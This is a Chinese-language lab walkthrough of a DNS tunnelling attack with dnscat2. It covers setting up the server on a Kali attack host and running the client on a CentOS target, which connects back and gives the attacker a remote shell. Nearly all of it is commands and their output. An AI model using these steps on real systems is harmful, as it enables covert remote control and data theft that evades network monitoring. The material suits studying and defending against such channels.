dns隧道攻击
金成济
一、dnscat2
攻击机(kali):192.168.137.134
靶机(centos):192.168.137.130
1、攻击机下载安装dnscat2
$ sudo git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install2、攻击机上运行命令:ruby ./dnscat2.rb --secret=123456
┌──(kali㉿kali)-[/home/dnscat2/server]
└─$ ruby ./dnscat2.rb --secret=123456
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...
It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=123456
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
dnscat2>3、靶机下载安装dnscat2
]# git clone https://github.com/iagox86/dnscat2.git
]# cd dnscat2/client/
]# make4、靶机运行命令:./dnscat --dns server=192.168.137.134,port=53 --secret=123456
./dnscat --dns server=【攻击机IP】,port=【攻击机端口默认是53】 --secret=【密码】
[root@localhost client]# ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 192.168.137.134
** Peer verified with pre-shared secret!
Session established!5、攻击机进行DNS隧道攻击
dnscat2> help
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (localhost.localdomain) [encrypted and verified]
2 :: sh (localhost.localdomain) [encrypted and verified] [*]
3 :: sh (localhost.localdomain) [encrypted and verified] [*]
4 :: sh (localhost.localdomain) [encrypted and verified] [*]
5 :: sh (localhost.localdomain) [encrypted and verified] [*]
dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
New window created: 3
New window created: 4
New window created: 5
sh (localhost.localdomain) 2> ifconfig
sh (localhost.localdomain) 2> ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.137.130 netmask 255.255.255.0 broadcast 192.168.137.255
inet6 fe80::a751:4e08:5cfc:30d5 prefixlen 64 sciopeid 0x20<link>
ether 00:0c:29:a9:45:54 txqueuelen 1000 (Ethernet)
RX packets 52871 bytes 44202390 (42.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23252 bytes 4082125 (3.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 276 bytes 24689 (24.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 276 bytes 24689 (24.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:27:81:06 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
类似资料: